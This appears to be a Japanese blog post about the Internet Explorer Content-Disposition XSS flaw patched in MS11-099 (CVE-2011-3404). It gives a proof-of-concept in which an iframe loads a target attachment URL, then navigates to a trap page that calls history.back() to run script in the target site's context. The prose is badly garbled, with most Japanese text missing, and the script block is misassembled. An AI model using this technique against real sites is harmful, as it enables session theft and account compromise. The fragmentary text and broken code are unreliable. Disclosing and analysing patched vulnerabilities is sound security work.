MS11-099 Internet Explorer 用の累積的なセキュリティ更新プログラム で修正されたXSSの話


  MS11-099 -  : Internet Explorer  (2618444) Content-Disposition  - CVE-2011-3404

Content-Disposition: attachment HTTPMS11-099使 Content-Disposition: attachment htmlInternet Explorer Wiki  Web XSS

iframe  Content-Disposition: attachment 
<iframe src="http://target.example.com/attachment.cgi" id="ifr"></iframe>
<script>
</script>
function f2(){
    document.getElementById("ifr").history.back();
}

function f1(){
    document.getElementById("ifr").location = "trap2.html";
}

setTimeout( 'f1()', 1000 );

 Content-Disposition  iframe  src IE
1setTimeout  iframe  src   trap2.html trap2.html 1
<script>history.back();</script>

iframe  src  Content-Disposition  Content-Disposition iframe XSS

Content-Disposition  - CVE-2011-3404Content-Disposition  - CVE-2011-3404 

?
調
2007WebMicrosoft4
(,)BK -  PoC